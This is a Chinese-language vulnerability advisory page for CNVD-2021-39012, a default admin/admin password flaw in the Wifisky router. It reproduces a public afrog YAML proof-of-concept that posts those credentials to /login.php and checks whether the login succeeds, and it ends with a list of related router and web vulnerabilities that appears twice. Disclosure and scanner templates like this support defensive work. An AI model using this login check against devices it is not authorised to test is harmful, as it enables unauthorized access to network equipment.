CNVD-2021-39012: Wifisky Default Password

日期: 2025-09-01 | 影响软件: Wifisky | POC: 已公开

漏洞描述

app="WIFISKY-7层流控路由器"

PoC代码[已公开]

id: CNVD-2021-39012

info:
    name: Wifisky Default Password
    author: Print1n(http://print1n.top)
    severity: high
    verified: false
    description: | 
        app="WIFISKY-7层流控路由器"
    reference:
    - https://securityforeveryone.com/tools/wifisky-default-password-scanner

rules:
    r0:
        request:
            method: POST
            path: /login.php?action=login&type=admin
            body: username=admin&password=admin
        expression: response.status == 200 && response.headers["content-type"].contains("text/html") && response.body.bcontains(b'"success":"true"') && response.body.bcontains(b'"data":')
expression: r0()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CNVD/2021/CNVD-2021-39012.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

领空技术WIFISKY7层流控路由器 /login.php 默认口令漏洞 无POC

WIFISKY-7层流控路由器 index.php 远程命令执行漏洞 无POC

领空技术 WIFISKY 7层流控路由器 /notice/confirm.php 远程命令执行漏洞 无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

D-Link DIR-645 命令注入漏洞 无POC

领空技术WIFISKY7层流控路由器 /login.php 默认口令漏洞无POC

WIFISKY-7层流控路由器 index.php 远程命令执行漏洞无POC

领空技术 WIFISKY 7层流控路由器 /notice/confirm.php 远程命令执行漏洞无POC

SourceCodester Pet Grooming Management Software SQL注入漏洞无POC

D-Link DIR-645 命令注入漏洞无POC